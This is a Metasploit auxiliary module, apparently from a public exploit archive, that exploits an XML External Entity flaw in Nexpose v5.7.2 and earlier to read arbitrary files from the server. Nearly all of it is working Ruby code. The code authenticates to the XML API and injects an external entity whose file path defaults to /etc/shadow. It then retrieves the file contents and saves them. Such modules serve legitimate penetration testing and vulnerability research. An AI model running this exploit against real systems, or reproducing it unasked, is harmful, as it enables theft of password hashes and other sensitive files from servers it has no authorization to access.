Nexpose XXE Arbitrary File Read
Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number of vectors. This vulnerability can allow an attacker to a craft special XML that could read arbitrary files from the filesystem. This Metasploit module exploits the vulnerability via the XML API.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'nexpose'class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report def initialize(info = {}) super( update_info( info, 'Name' => 'Nexpose XXE Arbitrary File Read', 'Description' => %q{ Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number of vectors. This vulnerability can allow an attacker to a craft special XML that could read arbitrary files from the filesystem. This module exploits the vulnerability via the XML API. }, 'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>', # Initial discovery and Metasploit module 'Drazen Popovic <drazen.popvic[at]infigo.hr>', # Independent discovery, alternate vector 'Bojan Zdrnja <bojan.zdrnja[at]infigo.hr>' # Independently reported ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'https://www.rapid7.com/blog/post/2013/08/16/r7-vuln-2013-07-24/' ] ], 'DefaultOptions' => { 'SSL' => true } ) ) register_options( [ Opt::RPORT(3780), OptString.new('USERNAME', [true, 'The Nexpose user', nil]), OptString.new('PASSWORD', [true, 'The Nexpose password', nil]), OptString.new('FILEPATH', [true, 'The filepath to read on the server', '/etc/shadow']) ] ) end def run user = datastore['USERNAME'] pass = datastore['PASSWORD'] trust_store = datastore['TRUST_STORE'] nsc = Nexpose::Connection.new(rhost, user, pass, rport, nil, nil, trust_store) print_status('Authenticating as: ' << user) begin nsc.login connection_details = { module_fullname: fullname, username: user, private_data: pass, private_type: :password, status: Metasploit::Model::Login::Status::UNTRIED }.merge(service_details) create_credential_and_login(connection_details) rescue StandardError print_error('Error authenticating, check your credentials') return end xml = '<!DOCTYPE foo [' xml << '<!ELEMENT host ANY>' xml << %(<!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}">) xml << ']>' xml << '<SiteSaveRequest session-id="' xml << nsc.session_id xml << '">' xml << '<Site id="-1" name="fdsa" description="fdfdsa">' xml << '<Hosts>' xml << '<host>&xxe;</host>' xml << '</Hosts>' xml << '<Credentials />' xml << '<Alerting />' xml << '<ScanConfig configID="-1" name="fdsa" templateID="full-audit" />' xml << '</Site>' xml << '</SiteSaveRequest>' print_status('Sending payload') begin fsa = nsc.execute(xml) rescue StandardError print_error('Error executing API call for site creation, ensure the filepath is correct') return end doc = REXML::Document.new fsa.raw_response_data id = doc.root.attributes['site-id'] xml = "<SiteConfigRequest session-id='" << nsc.session_id << "' site-id='" << id << "' />" print_status('Retrieving file') begin fsa = nsc.execute(xml) rescue StandardError nsc.site_delete id print_error('Error retrieving the file.') return end doc = REXML::Document.new fsa.raw_response_data print_status('Cleaning up') begin nsc.delete_site id rescue StandardError print_warning('Error while cleaning up site ID, manual cleanup required!') end unless doc.root.elements['//host'] print_error('No file returned. Either the server is patched or the file did not exist.') return end path = store_loot('nexpose.file', 'text/plain', rhost, doc.root.elements['//host'].first.to_s, "File from Nexpose server #{rhost}") print_good('File saved to path: ' << path) endend